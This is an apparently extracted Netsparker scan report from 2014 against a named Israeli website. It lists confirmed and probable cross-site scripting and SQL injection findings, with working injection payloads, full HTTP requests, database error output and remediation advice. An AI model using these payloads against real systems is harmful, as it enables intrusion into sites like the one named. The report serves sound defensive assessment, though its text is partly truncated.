WWW - Shalomlaam.co - Il 801

NETSPARKER SCAN REPORT SUMMARY
TARGET URL
http://www.shalomlaam.co.il/
SCAN DATE
20 15:41:03 2014
REPORT DATE
20 16:55:44 2014
SCAN DURATION
01:12:58
Total
Requests
59131
Average
Speed
13.51 req/sec.
268
identified
158
confirmed
10
critical
95
informational
SCAN SETTINGS
ENABLED
ENGINES
Static Tests, Find Backup Files, SQL Injection,
Boolean SQL Injection, Blind SQL Injection, Cross-site
Scripting, Command Injection, Blind Command Injection,
Local File Inclusion, Remote File Inclusion, Remote
Code Evaluation, HTTP Header Injection, Open
Redirection, Expression Language Injection
Authentication
Scheduled
VULNERABILITIES
CRITICAL
4%
IMPORTANT
57%
MEDIUM
3%
LOW
1%
INFORMATION
35%
1 / 146
VULNERABILITY SUMMARY
URL Parameter Method Vulnerability Confirmed
/ [Possible] Internal
Path Leakage (*nix)
No
/'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0000DB)%3C/script%3E
URI-BASED Full URL Cross-site Scripting Yes
/2minute/ [Possible] Internal
Path Leakage (*nix)
No
/about'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0004F1)%3C/script%3E
/about/ [Possible] Internal
Path Leakage (*nix)
No
/about/'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00013C)%3C/script%3E
/about/Default.asp [Possible] Internal
Path Leakage (*nix)
No
/about/reg/ Query
Based
Query
String
Cross-site Scripting Yes
/about/reg/'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0004FA)%3C/script%3E
/about/reg/maillingUpdate.asp Query
Based
Query
String
/about/reg/maillingUpdate.asp'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000522)%3C/script%3E
/about/search/ Query
Based
Query
String
/about/search/'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00052F)%3C/script%3E
/about/search/default.asp Query
Based
Query
String
/about/search/default.asp'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00055A)%3C/script%3E
/allvideo/ [Possible] Internal
Path Leakage (*nix)
No
/allvideo/'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001D1)%3C/script%3E
/alon/ [Possible] Internal
Path Leakage (*nix)
No
/alon/'%22--
/alon/archive.asp [Possible] Internal
Path Leakage (*nix)
No
/alon/Default.asp [Possible] Internal
Path Leakage (*nix)
No
/alon/Default.asp'%22--
/alon/list.asp [Possible] Internal
Path Leakage (*nix)
No
[Possible] Internal
Path Leakage
(Windows)
No
/alon/list.asp'%22--
/alon/mador.asp [Possible] Internal
Path Leakage (*nix)
No
[Possible] Internal
Path Leakage
(Windows)
No
/alon/musag.asp [Possible] Internal
Path Leakage (*nix)
No
/alon/musag.asp'%22--
2 / 146
/ask'%22--
/ask/ rabbi GET Cross-site Scripting Yes
cat GET Cross-site Scripting Yes
search POST Cross-site Scripting Yes
[Possible] Internal
Path Leakage (*nix)
No
[Possible] Internal
Path Leakage
(Windows)
No
/ask/'%22--
/ask/answer.asp Programming Error
Message
No
[Possible] Internal
Path Leakage (*nix)
No
[Possible] Internal
Path Leakage
(Windows)
No
/ask/answer.asp'%22--
/ask/ask_rabbi.asp [Possible] Internal
Path Leakage (*nix)
No
/ask/ask_rabbi.asp'%22--
/ask/Default.asp [Possible] Internal
Path Leakage (*nix)
No
[Possible] Internal
Path Leakage
(Windows)
No
/ask/reg/ Query
Based
Query
String
/ask/reg/'%22--
/ask/reg/maillingUpdate.asp Query
Based
Query
String
/ask/reg/maillingUpdate.asp'%22--
/ask/search/'%22--
/banner/'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00057B)%3C/script%3E
/bmidrash/ [Possible] Internal
Path Leakage (*nix)
No
/bmidrash/'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001C7)%3C/script%3E
/bmidrash/answer.asp [Possible] Internal
Path Leakage (*nix)
No
/bmidrash/bprint.asp [Possible] Internal
Path Leakage (*nix)
No
/bmidrash/Default.asp [Possible] Internal
Path Leakage (*nix)
No
/bmidrash/list.asp [Possible] Internal
Path Leakage (*nix)
No
/bmidrash/mekorot.asp [Possible] Internal
Path Leakage (*nix)
No
/Branches/'%22--
/Branches/snif.asp [Possible] Internal
Path Leakage (*nix)
No
/Branches/snif.asp'%22--
3 / 146
/contact/ name_id POST SQL Injection Yes
sendFrom POST [Probable] SQL
Injection
No
name POST [Probable] SQL
Injection
No
phone POST [Probable] SQL
Injection
No
subject POST [Probable] SQL
Injection
No
f_name POST [Probable] SQL
Injection
No
name_id POST [Probable] SQL
Injection
No
MS SQL Version Is
Out Of Date
No
Microsoft SQL Server
Identified
Yes
E-mail Address
Disclosure
No
[Possible] Internal
Path Leakage (*nix)
No
/contact/'%22--
/contact/Default.asp [Possible] Internal
Path Leakage (*nix)
No
/contact/reg/ Query
Based
Query
String
/contact/reg/'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00046E)%3C/script%3E
/contact/reg/maillingUpdate.asp Query
Based
Query
String
/contact/reg/maillingUpdate.asp'%22--
/contact/search/ Query
Based
Query
String
/contact/search/'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0004A9)%3C/script%3E
/contact/search/default.asp Query
Based
Query
String
/contact/search/default.asp'%22--
/crossdomain.xml Open Policy
Crossdomain.xml
Identified
Yes
/Default.asp [Possible] Internal
Path Leakage (*nix)
No
/default.asp'%22--
/etz_haim/'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001B2)%3C/script%3E
/gallery/ [Possible] Internal
Path Leakage (*nix)
No
[Possible] Internal
Path Leakage
(Windows)
No
/gallery/'%22--
/gallery/branches.asp [Possible] Internal
Path Leakage (*nix)
No
[Possible] Internal
Path Leakage
(Windows)
No
4 / 146
/gallery/Default.asp [Possible] Internal
Path Leakage (*nix)
No
[Possible] Internal
Path Leakage
(Windows)
No
/gallery/Default.asp'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00026D)%3C/script%3E
/gallery/snifim.asp [Possible] Internal
Path Leakage (*nix)
No
/gallery/upload_img.asp File Upload
Functionality
Identified
Yes
[Possible] Internal
Path Leakage (*nix)
No
/gvideo/'%22--
/gvideo/index.html'%22--
/gvideo/js/'%22--
/gvideo/js/swfaddress.js'%22--
/gvideo/js/swfobject.js'%22--
/gvideo/style/'%22--
/gvideo/style/style.css'%22--
/gvideo/testimonialrotator/'%22--
/gvideo/testimonialrotator/testimonialrotator.css'%22--
/gvideo/testimonialrotator/testimonialrotator.js'%22--
/hagim/ [Possible] Internal
Path Leakage (*nix)
No
/hagim/3shavuot.asp [Possible] Internal
Path Leakage (*nix)
No
/home/'%22--
/home/1.css'%22--
/home/home_page.css'%22--
/images/ Internal Server Error Yes
/images/'%22--
/images/Default.asp'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0003E9)%3C/script%3E
/images/pagetop.asp Query
Based
Query
String
/images/pagetop.asp'%22--
/jAccordion/'%22--
/jAccordion/default.css'%22--
/jAccordion/jquery.easing.1.3.min.js'%22--
/jAccordion/jquery.jAccordion-1.2.1.min.js'%22--
/js/ Forbidden Resource Yes
/js/'%22--
5 / 146
/js/+%20win%20+ Query
Based
Query
String
/js/+%20win%20+'%22--
/js/AC_RunActiveContent.js'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0000DF)%3C/script%3E
/js/delate_image.asp Query
Based
Query
String
/js/delate_image.asp'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0003CE)%3C/script%3E
/js/func_site.js'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0000DC)%3C/script%3E
/js/getbanner.asp Query
Based
Query
String
/js/getbanner.asp'%22--
/js/HebDate.js'%22--
/js/images/ Query
Based
Query
String
/js/images/'%22--
/js/top1.htm Query
Based
Query
String
/js/top1.htm'%22--
/js/upload_image.asp Query
Based
Query
String
/js/upload_image.asp'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0003AF)%3C/script%3E
/kaftorim/'%22--
/komiks/ [Possible] Internal
Path Leakage (*nix)
No
/komiks/Default.asp [Possible] Internal
Path Leakage (*nix)
No
/l/ [Possible] Internal
Path Leakage (*nix)
No
/l/'%22--
/l/agrala_miadim.asp [Possible] Internal
Path Leakage (*nix)
No
/l/agrala_sheelot.asp [Possible] Internal
Path Leakage (*nix)
No
/l/agrala_takanon.asp [Possible] Internal
Path Leakage (*nix)
No
/l/agrala_tozaot.asp [Possible] Internal
Path Leakage (*nix)
No
/l/Default.asp [Possible] Internal
Path Leakage (*nix)
No
/lessons/ yom POST [Probable] SQL
Injection
No
[Possible] Internal
Path Leakage (*nix)
No
/lessons/'%22--
/lessons/default.asp yom POST [Probable] SQL
Injection
No
[Possible] Internal
Path Leakage (*nix)
No
/LIVE/ [Possible] Internal
Path Leakage (*nix)
No
/LIVE/'%22--
6 / 146
/live/form_live.asp [Possible] Internal
Path Leakage (*nix)
No
/maillingUpdate.asp Query
Based
Query
String
/maillingUpdate.asp'%22--
/news'%22--
/news/ [Possible] Internal
Path Leakage (*nix)
No
/news/'%22--
/news/Default.asp [Possible] Internal
Path Leakage (*nix)
No
/page/ [Possible] Internal
Path Leakage (*nix)
No
/page/'%22--
/page/odot/'%22--
/pages/ [Possible] Internal
Path Leakage (*nix)
No
/pages/'%22--
/pages/Default.asp [Possible] Internal
Path Leakage (*nix)
No
/pages/page.asp [Possible] Internal
Path Leakage (*nix)
No
/pages/page.asp'%22--
/pagetop.asp [Possible] Internal
Path Leakage (*nix)
No
/pic/'%22--
/pitgam'%22--
/pitgam/ [Possible] Internal
Path Leakage (*nix)
No
[Possible] Internal
Path Leakage
(Windows)
No
/pitgam/'%22--
/pitgam/Default.asp [Possible] Internal
Path Leakage (*nix)
No
[Possible] Internal
Path Leakage
(Windows)
No
/Presentation/ [Possible] Internal
Path Leakage (*nix)
No
/Presentation/'%22--
/Presentation/Default.asp [Possible] Internal
Path Leakage (*nix)
No
/reg/ email POST [Probable] SQL
Injection
No
[Possible] Internal
Path Leakage (*nix)
No
/reg/'%22--
/reg/Default.asp [Possible] Internal
Path Leakage (*nix)
No
7 / 146
/reg/login.asp Password
Transmitted Over
HTTP
Yes
Auto Complete
Enabled
Yes
[Possible] Internal
Path Leakage (*nix)
No
/reg/maillingUpdate.asp Database Error
Message
No
[Possible] Internal
Path Leakage (*nix)
No
/reg/maillingUpdate.asp'%22--
/reg/reg.asp [Possible] Internal
Path Leakage (*nix)
No
/scripts/'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0000FD)%3C/script%3E
/scripts/swfobject.js'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0000FF)%3C/script%3E
/search/ [Possible] Internal
Path Leakage (*nix)
No
/search/'%22--
/search/default.asp q GET Cross-site Scripting Yes
[Possible] Internal
Path Leakage (*nix)
No
/search/default.asp'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001DA)%3C/script%3E
/sh/ [Possible] Internal
Path Leakage (*nix)
No
/sh/default.asp [Possible] Internal
Path Leakage (*nix)
No
/sipur/ [Possible] Internal
Path Leakage (*nix)
No
[Possible] Internal
Path Leakage
(Windows)
No
/sipur/'%22--
/sipur/Default.asp [Possible] Internal
Path Leakage (*nix)
No
/sipur/page.asp [Possible] Internal
Path Leakage (*nix)
No
[Possible] Internal
Path Leakage
(Windows)
No
/sipur/send_sipur.asp [Possible] Internal
Path Leakage (*nix)
No
/site/'%22--
/site/about/'%22--
/site/alon/'%22--
/site/alon/archive.asp'%22--
/site/alon/list.asp CatID GET HTTP Header
Injection
No
/site/alon/list.asp'%22--
/site/ask/ CatID GET HTTP Header
Injection
No
/site/ask/'%22--
8 / 146
/site/ask/answer.asp id GET HTTP Header
Injection
No
/site/ask/answer.asp'%22--
/site/ask/answer_print.asp [Possible] Internal
Path Leakage
(Windows)
No
/site/ask/ask_rabbi.asp'%22--
/site/bmidrash/'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0002AD)%3C/script%3E
/site/bmidrash/answer.asp id GET HTTP Header
Injection
No
/site/bmidrash/answer.asp'%22--
/site/bmidrash/list.asp'%22--
/site/bmidrash/mekorot.asp id GET HTTP Header
Injection
No
/site/bmidrash/mekorot.asp'%22--
/site/Branches/'%22--
/site/contact/'%22--
/site/etz_haim/'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0002AE)%3C/script%3E
/site/gallery/ IIS Version
Disclosure
No
/site/gallery/'%22--
/site/gallery/highslide/'%22--
/site/gallery/highslide/highslide.css'%22--
/site/gallery/highslide/highslide-full.js'%22--
/site/l/'%22--
/site/l/agrala_miadim.asp'%22--
/site/l/agrala_sheelot.asp'%22--
/site/l/agrala_takanon.asp'%22--
/site/l/agrala_tozaot.asp'%22--
/site/pic/'%22--
/site/pitgam/ CatID GET HTTP Header
Injection
No
/site/pitgam/'%22--
/site/Presentation/'%22--
/site/reg/'%22--
/site/reg/login.asp'%22--
/site/reg/reg.asp'%22--
/site/uploadimages/'%22--
9 / 146
/site/yeshiva/'%22--
/sitemap.xml Sitemap Identified No
/snif.asp Query
Based
Query
String
/snif.asp'%22--
/tags/ q GET Cross-site Scripting Yes
[Possible] Internal
Path Leakage (*nix)
No
/tags/'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001BB)%3C/script%3E
/tags/tags.asp [Possible] Internal
Path Leakage (*nix)
No
[Possible] Internal
Path Leakage
(Windows)
No
/tags/tags.asp'%22--
%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001CB)%3C/script%3E
/UploadImages/'%22--
/uploadimages/2011_8_22_13_2_45.JPG'%22--
/video/ [Possible] Internal
Path Leakage (*nix)
No
/video/'%22--
/video/Default.asp [Possible] Internal
Path Leakage (*nix)
No
/vod/ [Possible] Internal
Path Leakage (*nix)
No
/vod/'%22--
/vod/vod.asp id GET Cross-site Scripting Yes
[Possible] Internal
Path Leakage (*nix)
No
[Possible] Internal
Path Leakage
(Windows)
No
/vod/vod.asp'%22--
/yeshiva/'%22--
10 / 146
1 TOTAL
CRITICAL
CONFIRMED
1
1. SQL Injection
SQL Injection occurs when data input for example by a user is interpreted as a SQL command rather than normal data by the
backend database. This is an extremely common vulnerability and its successful exploitation can have critical implications. Netsparker
confirmed the vulnerability by executing a test SQL Query on the back-end database.
{PRODUCT} identified an SQL injection, which occurs when data input by a user is interpreted as an SQL command rather than as
normal data by the backend database.
This is an extremely common vulnerability and its successful exploitation can have critical implications.
{PRODUCT} confirmed the vulnerability by executing a test SQL query on the backend database.
Impact
Depending on the backend database, the database connection settings and the operating system, an attacker can mount one or more of the following type of
attacks successfully:
Reading, updating and deleting arbitrary data or tables from the database
Executing commands on the underlying operating system
Actions to Take
1. See the remedy for solution.
2. If you are not using a database access layer (DAL), consider using one. This will help you centralize the issue. You can also use ORM (object relational
mapping). Most of the ORM systems use only parameterized queries and this can solve the whole SQL injection problem.
3. Locate all of the dynamically generated SQL queries and convert them to parameterized queries. (If you decide to use a DAL/ORM, change all legacy
code to use these new libraries.)
4. Use your weblogs and application logs to see if there were any previous but undetected attacks to this resource.
Remedy
A robust method for mitigating the threat of SQL injection-based vulnerabilities is to use parameterized queries (prepared statements). Almost all modern
languages provide built-in libraries for this. Wherever possible, do not create dynamic SQL queries or SQL queries with string concatenation.
Required Skills for Successful Exploitation
There are numerous freely available tools to exploit SQL injection vulnerabilities. This is a complex area with many dependencies; however, it should be
noted that the numerous resources available in this area have raised both attacker awareness of the issues and their ability to discover and leverage them.
SQL injection is one of the most common web application vulnerabilities.
External References
OWASP SQL injection
SQL injection Cheatsheet
Remedy References
MSDN - Protect From SQL injection in ASP.NET
Classification
OWASP A1 PCI v1.2-6.5.2 PCI v2.0-6.5.1 CWE-89 CAPEC-66 WASC-19
1.1. /contact/ CONFIRMED
http://www.shalomlaam.co.il/contact/
Parameters
Parameter Type Value
action POST contact
f_name POST Smith
mail POST
message POST 3
name POST Smith
name_id POST convert(int,
(CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50
)+CHAR(100)+CHAR(105)+CHAR(108)+CHA
R(101)+CHAR(109)+CHAR(109)+CHAR(97))
)
phone POST 3
sendFrom POST 3
subject POST 3
11 / 146
Extracted Data
microsoft sql server 2005 - 9.00.3042.00 (intel x86) feb 9 2007 22:47:07 copyright (c) 1988-2005 microsoft corporation express edition on
windows nt 5.2 (build 3790: service pack 2)
Request
POST /contact/ HTTP/1.1
Referer: http://www.shalomlaam.co.il/contact/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Accept-Language: en-us,en;q=0.5
Content-Type: application/x-www-form-urlencoded
Host: www.shalomlaam.co.il
Cookie: first%5Fvisit=NO; ASPSESSIONIDQSCQSADR=ELPNNBKBLPOCIADNOGIBMLMA
Content-Length: 258
Accept-Encoding: gzip, deflate
action=contact&f_name=Smith&mail=%ef%bf%bd%ef%bf%bd%ef%bf%bd&message=3&name=Smith&name_id=convert(int,
(CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97)))&phone=3&sendFrom=3&subject=3
Response
"Arial" size=2><p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial" size=2>error '80040e07'</font><p><font face="Arial" size=2>Conversion failed when converting the
varchar value '_!@2dilemma' to data type int.</font><p><font face="Arial" size=2>/contact/Default.asp</font><font face="Arial" size=2>, line 46</font>
12 / 146
9 TOTAL
CRITICAL
2. [Probable] SQL Injection
SQL Injection occurs when data input for example by a user is interpreted as a SQL command rather than normal data by the
backend database. This is an extremely common vulnerability and its successful exploitation can have critical implications. Even
though Netsparker believes that there is a SQL Injection in here it could not confirm it. There can be numerous reasons for Netsparker not being able to
confirm this. We strongly recommend investigating the issue manually to ensure that it is an SQL Injection and that it needs to be addressed. You can also
consider sending the details of this issue to us, in order that we can address this issue for the next time and give you a more precise result.
{PRODUCT} identified a probable SQL injection, which occurs when data input by a user is interpreted as an SQL command rather than as normal data by the
backend database.
This is an extremely common vulnerability and its successful exploitation can have critical implications.
Even though {PRODUCT} believes there is a SQL injection in here, it could not confirm it. There can be numerous reasons for {PRODUCT} not being able to
confirm this. We strongly recommend investigating the issue manually to ensure it is an SQL injection and that it needs to be addressed. You can also
consider sending the details of this issue to us so we can address this issue for the next time and give you a more precise result.
Impact
Depending on the backend database, database connection settings and the operating system, an attacker can mount one or more of the following type of
attacks successfully:
Reading, updating and deleting arbitrary data/tables from the database.
Executing commands on the underlying operating system.
Actions to Take
2. If you are not using a database access layer (DAL) within the architecture consider its benefits and implement if appropriate. As a minimum the use of
s DAL will help centralize the issue and its resolution. You can also use ORM (object relational mapping). Most ORM systems use parameterized queries
and this can solve many if not all SQL injection based problems.
3. Locate all of the dynamically generated SQL queries and convert them to parameterized queries. (If you decide to use a DAL/ORM, change all legacy
code to use these new libraries.)
4. Monitor and review weblogs and application logs to uncover active or previous exploitation attempts.
Remedy
A very robust method for mitigating the threat of SQL injection-based vulnerabilities is to use parameterized queries (prepared statements). Almost all
modern languages provide built-in libraries for this. Wherever possible, do not create dynamic SQL queries or SQL queries with string concatenation.
There are numerous freely available tools to test for SQL injection vulnerabilities. This is a complex area with many dependencies; however, it should be
noted that the numerous resources available in this area have raised both attacker awareness of the issues and their ability to discover and leverage them.
SQL injection is one of the most common web application vulnerabilities.
External References
OWASP SQL injection
SQL injection Cheat Sheet
Remedy References
SQL injection Prevention Cheat Sheet
MSDN - Protect From SQL injection in ASP.NET
OWASP Preventing SQL injection in Java
Prepared Statements and Stored Procedures in PHP
Classification
13 / 146
2.1. /contact/
Parameters
action POST contact
f_name POST Smith
mail POST
message POST 3
name POST Smith
name_id POST 0
phone POST 3
sendFrom POST -1 or 1=1 and (select 1 and row(1,1)>(select
count(*),concat(CONCAT(CHAR(95),CHAR(3
3),CHAR(64),CHAR(52),CHAR(100),CHAR(10
5),CHAR(108),CHAR(101),CHAR(109),CHAR(
109),CHAR(97)),0x3a,floor(rand()*2))x
from (select 1 union select 2)a group by x
limit 1))
subject POST 3
Certainty
Request
Content-Length: 438
action=contact&f_name=Smith&mail=%ef%bf%bd%ef%bf%bd%ef%bf%bd&message=3&name=Smith&name_id=0&phone=3&sendFrom=-
1%20or%201%3d1%20and%20(select%201%20and%20row(1%2c1)%3e(select%20count(*)%2cconcat(CONCAT(CHAR(95)%2cCHAR(33)%2cCHAR(64)%2cCHAR(52)%2cCHAR(100)%2cCHAR(105)%2cCHAR(108)%2cCHAR(101)%2cCHAR(
109)%2cCHAR(109)%2cCHAR(97))%2c0x3a%2cfloor(rand()*2))x%20from%20(select%201%20union%20select%202)a%20group%20by%20x%20limit%201))&subject=3
Response
src="pic/logo.jpg" width="130" height="130" alt="" /></td>-->

</tr>
</table> <p class="text_2"> </p>
</td></tr>
<font face="Arial" size=2><p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial" size=2>error '80040e57'</font><p><font face="Arial" size=2>String or binary data would be
truncated.</font><p><font face="Arial" size=2>/contact/Default.asp</font><font face="Arial" size=2>, line 46</fon
14 / 146
2.2. /contact/
Parameters
action POST contact
f_name POST Smith
mail POST
message POST 3
name POST -1 or 1=1 and (select 1 and row(1,1)>(select
limit 1))
name_id POST 0
phone POST 3
sendFrom POST 3
subject POST 3
Certainty
Request
Content-Length: 434
action=contact&f_name=Smith&mail=%ef%bf%bd%ef%bf%bd%ef%bf%bd&message=3&name=-
109)%2cCHAR(109)%2cCHAR(97))%2c0x3a%2cfloor(rand()*2))x%20from%20(select%201%20union%20select%202)a%20group%20by%20x%20limit%201))&name_id=0&phone=3&sendFrom=3&subject=3
Response

</tr>
</td></tr>
15 / 146
2.3. /contact/
Parameters
action POST contact
f_name POST Smith
mail POST
message POST 3
name POST Smith
name_id POST 0
phone POST (select
convert(int,CHAR(95)+CHAR(33)+CHAR(64)
+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(
108)+CHAR(101)+CHAR(109)+CHAR(109)+
CHAR(97)) FROM syscolumns)
sendFrom POST 3
subject POST 3
Certainty
Request
Content-Length: 289
action=contact&f_name=Smith&mail=%ef%bf%bd%ef%bf%bd%ef%bf%bd&message=3&name=Smith&name_id=0&phone=
(select%20convert(int%2cCHAR(95)%2bCHAR(33)%2bCHAR(64)%2bCHAR(50)%2bCHAR(100)%2bCHAR(105)%2bCHAR(108)%2bCHAR(101)%2bCHAR(109)%2bCHAR(109)%2bCHAR(97))%20FROM%20syscolumns)&sendFrom=3&subjec
t=3
Response

</tr>
</td></tr>
16 / 146
2.4. /contact/
Parameters
action POST contact
f_name POST Smith
mail POST
message POST 3
name POST Smith
name_id POST 0
phone POST 3
sendFrom POST 3
subject POST -1 or 1=1 and (select 1 and row(1,1)>(select
limit 1))
Certainty
Request
Content-Length: 438
action=contact&f_name=Smith&mail=%ef%bf%bd%ef%bf%bd%ef%bf%bd&message=3&name=Smith&name_id=0&phone=3&sendFrom=3&subject=-
109)%2cCHAR(109)%2cCHAR(97))%2c0x3a%2cfloor(rand()*2))x%20from%20(select%201%20union%20select%202)a%20group%20by%20x%20limit%201))
Response

</tr>
</td></tr>
17 / 146
2.5. /reg/
http://www.shalomlaam.co.il/reg/
Parameters
action POST add
bpdf POST 1
btn1 POST
email POST (select
108)+CHAR(101)+CHAR(109)+CHAR(109)+
CHAR(97)) FROM syscolumns)
f_name POST Smith
name POST Smith
phone POST 3
radio POST alon
Certainty
Request
POST /reg/ HTTP/1.1
Referer: http://www.shalomlaam.co.il/reg/
Content-Length: 270
action=add&bpdf=1&btn1=%ef%bf%bd%ef%bf%bd%ef%bf%bd&email=
(select%20convert(int%2cCHAR(95)%2bCHAR(33)%2bCHAR(64)%2bCHAR(50)%2bCHAR(100)%2bCHAR(105)%2bCHAR(108)%2bCHAR(101)%2bCHAR(109)%2bCHAR(109)%2bCHAR(97))%20FROM%20syscolumns)&f_name=Smith&name
=Smith&phone=3&radio=alon
Response
yle="background:url('images/kiv.gif') repeat-x; width:100%; height:2px;"></td></tr></table><br><br></td></tr></table>

<p class="text_ratz_bold"> </p>
truncated.</font><p><font face="Arial" size=2>/reg/Default.asp</font><font face="Arial" size=2>, line 28</font>
2.6. /contact/
Parameters
action POST contact
f_name POST -1 or 1=1 and (select 1 and row(1,1)>(select
limit 1))
mail POST
message POST 3
name POST Smith
name_id POST 0
phone POST 3
sendFrom POST 3
subject POST 3
18 / 146
Certainty
Request
Content-Length: 434
action=contact&f_name=-
109)%2cCHAR(109)%2cCHAR(97))%2c0x3a%2cfloor(rand()*2))x%20from%20(select%201%20union%20select%202)a%20group%20by%20x%20limit%201))&mail=%ef%bf%bd%ef%bf%bd%ef%bf%bd&message=3&name=Smith&nam
e_id=0&phone=3&sendFrom=3&subject=3
Response

</tr>
</td></tr>
2.7. /contact/
Parameters
action POST contact
f_name POST Smith
mail POST
message POST 3
name POST Smith
name_id POST %27
phone POST 3
sendFrom POST 3
subject POST 3
Certainty
Request
Content-Length: 124
action=contact&f_name=Smith&mail=%ef%bf%bd%ef%bf%bd%ef%bf%bd&message=3&name=Smith&name_id=%2527&phone=3&sendFrom=3&subject=3
Response

</tr>
</td></tr>
<font face="Arial" size=2><p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial" size=2>error '80040e14'</font><p><font face="Arial" size=2>Incorrect syntax near '27'.
</font><p><font face="Arial" size=2>/contact/Default.asp</font><font face="Arial" size=2>, line 46</font>
19 / 146
2.8. /lessons/
http://www.shalomlaam.co.il/lessons/
Parameters
action POST search
yom POST '+ (select
108)+CHAR(101)+CHAR(109)+CHAR(109)+
CHAR(97)) FROM syscolumns) +'
snif POST 3
subjects POST 0
Certainty
Request
POST /lessons/ HTTP/1.1
Referer: http://www.shalomlaam.co.il/lessons/
Content-Length: 220
action=search&yom='%2b%20(select%20convert(int%2cCHAR(95)%2bCHAR(33)%2bCHAR(64)%2bCHAR(50)%2bCHAR(100)%2bCHAR(105)%2bCHAR(108)%2bCHAR(101)%2bCHAR(109)%2bCHAR(109)%2bCHAR(97))%20FROM%20sysc
olumns)%20%2b'&snif=3&subjects=0
Response
td>
<td width="10" height="5"></td>
</tr>
<tr><td colspan="6">
<table cellpadding="3" cellspacing="3" border="0" dir="ltr">
<font face="Arial" size=2><p>Microsoft OLE DB Provider for ODBC Drivers</font> <font face="Arial" size=2>error '80040e37'</font><p><font face="Arial" size=2>[Microsoft][ODBC Excel Driver]
The Microsoft Jet database engine could not find the object 'syscolumns'. Make s
2.9. /lessons/default.asp
http://www.shalomlaam.co.il/lessons/default.asp
Parameters
action POST search
yom POST '+ (select
108)+CHAR(101)+CHAR(109)+CHAR(109)+
CHAR(97)) FROM syscolumns) +'
snif POST 3
subjects POST 0
Certainty
Request
POST /lessons/default.asp HTTP/1.1
Content-Length: 220
action=search&yom='%2b%20(select%20convert(int%2cCHAR(95)%2bCHAR(33)%2bCHAR(64)%2bCHAR(50)%2bCHAR(100)%2bCHAR(105)%2bCHAR(108)%2bCHAR(101)%2bCHAR(109)%2bCHAR(109)%2bCHAR(97))%20FROM%20sysc
olumns)%20%2b'&snif=3&subjects=0
20 / 146
Response
td>
<td width="10" height="5"></td>
</tr>
<tr><td colspan="6">
<table cellpadding="3" cellspacing="3" border="0" dir="ltr">
<font face="Arial" size=2><p>Microsoft OLE DB Provider for ODBC Drivers</font> <font face="Arial" size=2>error '80040e37'</font><p><font face="Arial" size=2>[Microsoft][ODBC Excel Driver]
The Microsoft Jet database engine could not find the object 'syscolumns'. Make s
21 / 146
150 TOTAL
IMPORTANT
CONFIRMED
150
3. Cross-site Scripting
XSS (Cross-site Scripting) allows an attacker to execute a dynamic script (Javascript, VbScript) in the context of the application. This
allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by
changing the HTML on the fly to steal the user's credentials. This happens because the input entered by a user has been interpreted
as HTML/Javascript/VbScript by the browser.
XSS targets the users of the application instead of the server. Although this is a limitation, since it allows attackers to hijack other
users' session, an attacker might attack an administrator to gain full control over the application.
{PRODUCT} detected cross-site scripting, which allows an attacker to execute a dynamic script (JavaScript, VBScript) in the context of the application.
This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on
the fly to steal the user's credentials. This happens because the input entered by a user has been interpreted as HTML/JavaScript/VBScript by the browser.
Cross-site scripting targets the users of the application instead of the server. Although this is a limitation, since it allows attackers to hijack other users'
sessions, an attacker might attack an administrator to gain full control over the application.
Impact
There are many different attacks that can be leveraged through the use of cross-site scripting, including:
Hijacking user's active session.
Mounting phishing attacks.
Intercepting data and performing man-in-the-middle attacks.
Remedy
The issue occurs because the browser interprets the input as active HTML, JavaScript or VBScript. To avoid this, output should be encoded according to the
output location and context. For example, if the output goes in to a JavaScript block within the HTML document, then output needs to be encoded
accordingly. Encoding can get very complex, therefore it's strongly recommended to use an encoding library such as OWASP ESAPI and Microsoft Anti-cross-
site scripting.
Remedy References
Microsoft Anti-XSS Library
OWASP XSS Prevention Cheat Sheet
OWASP AntiSamy Java
External References
XSS Cheat Sheet
OWASP - cross-site scripting
XSS Shell
XSS Tunnelling
Proof of Concept Notes
